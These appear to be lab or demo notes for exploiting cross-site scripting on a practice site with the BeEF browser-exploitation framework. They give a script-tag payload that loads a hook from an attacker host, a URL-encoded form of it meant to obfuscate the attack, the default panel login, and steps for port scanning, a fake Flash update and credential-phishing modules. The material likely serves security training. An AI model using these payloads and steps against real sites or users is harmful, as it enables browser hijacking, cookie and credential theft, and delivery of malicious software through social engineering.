Used to exploit XSS and run a number of attacks against the user’s browser: cookie theft, credential theft, port scans, metasploit modules, etc.
Browse to xss.cddexploit.net. Reflected will put parameters in query string and payload can be dropped there. Search for Gibbons, and edit case 42. Payload can be dropped in the details field. Then, use the Persisted page to view the case details.
Steps
Start BEEF on the attack host
Browse to your ui page from the VM (http://192.168.209.146:3000/ui/panel) and ensure the ui loads.
Drop the payload ( <script src="http://192.168.209.146:3000/hook.js"></script> ) into the Status box of the vulnerable page orpaste it into the querystring.
To obfuscate the attack a little, use Burp and turn the hook url into a url encoded string for reflected attacks and paste it into the querystring.
xss.cddexploit.net/Content/Vulnerable/Reflected.aspx?status=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%39%2e%31%34%36%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e%20
From the attack host, open the ui page (http://192.168.209.146:3000/ui/panel) and login (beef/beef)
Open the command console, and show people around.
Run a port scan (Network, Port Scanner) against 192.168.209.146
Help the user perform a google search (Misc, Google Search)
Run Fake Flash Update (Social Engineering, Fake Flash Update) updating the image to 192.168.209.146
Run Pretty Theft (Social Engineering, Patty Theft) updating the image to 192.168.209.146